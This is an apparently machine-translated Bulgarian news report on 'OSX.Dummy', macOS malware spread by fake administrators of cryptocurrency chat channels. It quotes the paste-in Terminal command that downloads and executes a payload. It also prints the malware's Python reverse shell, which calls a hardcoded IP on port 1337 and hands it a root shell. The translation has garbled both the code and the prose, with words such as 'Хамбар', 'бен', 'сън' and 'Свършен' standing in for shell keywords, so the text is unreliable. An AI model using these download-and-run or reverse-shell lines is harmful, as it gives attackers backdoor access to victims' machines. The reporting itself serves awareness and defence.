Наистина тъпият зловреден софтуер е насочен към феновете на криптовалутата използване на Macs

Admaril Ackbar на Meme от Междузвездни войни казва, че това е капан.EnlargeLucasfilm

Някой, представящ се за администратори на криптовалути дискусионни канали за Slack, Discord и други социални съобщения платформи се опитват да примамят другите да инсталират macOS зловреден софтуер. Социално-инженерната кампания се състои в публикуване на a скрипт в дискусии и насърчаване на хората да го копират и поставят скрипт в прозорец на терминала на техните Macs. Командата изтегля огромен (34 мегабайта) файл и го изпълнява, установявайки дистанционно връзка, която действа като задна врата на нападателя.

Патрик Уордъл, експерт по зловреден софтуер на Mac, също прегледа зловредния софтуер и го нарече “OSX.Dummy”, защото, както той написа:

  • методът на инфекция е тъп
  • масивният размер на двоичния е тъп
  • механизмът за постоянство е куц (и следователно също тъп)
  • възможностите са доста ограничени (и по този начин доста тъпи)
  • тривиално е да откривате на всяка стъпка (тази тъпа)
  • … и накрая, зловредният софтуер записва паролата на потребителя в dumpdummy

Атаката, за първи път отбелязана от Ремко Верхоеф от ДАНС днес, изтегля неудобния полезен товар от отдалечен сървър, прави този файл изпълним и го изпълнява. Изглежда така:

cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script

Бинарният чудовище носи със себе си множество библиотеки, включително Open SSL библиотеки за криптиране на връзките му обратно сървърът – система, работеща в център за данни на хостинга доставчик CrownCloud. След като се изпълни, използва командата suправя за направи себе си собственост на root потребител на macOS. За да може това да случи се, жертвата трябва да въведе парола, за да позволи на скрипта да продължи. Скриптът съхранява тази парола във временен файл наречена “тъпана”. Скриптът също така издава команди за добавяне на себе си към стартовия списък за macOS – правейки се постоянен.

Закритият код на скрипта, както Wardle отбеляза, е рекурсивен Обаждане в команден ред на Python с твърдо кодиран IP адрес за връзка, която използва порт 1337 – очевидна шеговита шега.

#! / Хамбар / Баш

докато :

do

python -c ‘сокет за импортиране, подпроцес, os; S = socket.socket (socket.AF_INET, socket.SOCK_STREAM); s.connect (( “185.243.115.230”, 1337)); os.dup2 (s.fileno (), 0); os.dup2 (s.fileno (), 1); os.dup2 (s.fileno (), 2); р = subprocess.call ([ “/ бен / ш”, “- и”]); ”

сън 5

Свършен

Намерението на нападателя все още не е ясно. Но защото всичко това се изпълнява през прозорец на терминал, той заобикаля GateKeeper на MacOS защита от зловреден софтуер, въпреки че не е подписан код. И това дава атакуващ способността да изпълнява кода на командния ред като root потребител на заразени Macs. Разбира се, кодът трябва да преодолее общото чувство и на жертвата.

Like this post? Please share to your friends:
Leave a Reply

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!: